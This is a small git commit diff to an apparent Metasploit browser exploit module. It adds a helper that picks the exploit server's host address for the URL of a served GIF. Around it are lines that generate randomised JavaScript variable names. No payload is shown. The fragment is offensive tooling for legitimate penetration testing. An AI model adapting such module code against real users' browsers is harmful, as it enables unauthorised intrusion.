commit
2b7d25950b
|
@ -75,6 +75,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
|
||||
end
|
||||
|
||||
def get_srvhost
|
||||
# If the SRVHOST isn't the default 0.0.0.0, obviously the user wants to
|
||||
# specify, so we will not force source_address()
|
||||
return datastore['SRVHOST'] if datastore['SRVHOST'] != '0.0.0.0'
|
||||
Rex::Socket.source_address(cli.peerhost)
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if (request.uri.match(/\.gif$/i))
|
||||
|
@ -187,7 +194,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
j_memory = rand_text_alpha(rand(100) + 1)
|
||||
j_counter = rand_text_alpha(rand(30) + 2)
|
||||
|
||||
host = Rex::Socket.source_address(cli.peerhost) + ":" + (datastore["SRVPORT"].to_s)
|
||||
host = get_srvhost + ":" + (datastore["SRVPORT"].to_s)
|
||||
gif_uri = "http#{(datastore['SSL'] ? 's' : '')}://#{host}"
|
||||
if ("/" == get_resource[-1,1])
|
||||
gif_uri << get_resource[0, get_resource.length - 1]
|
||||
|
|
Loading…
Reference in New Issue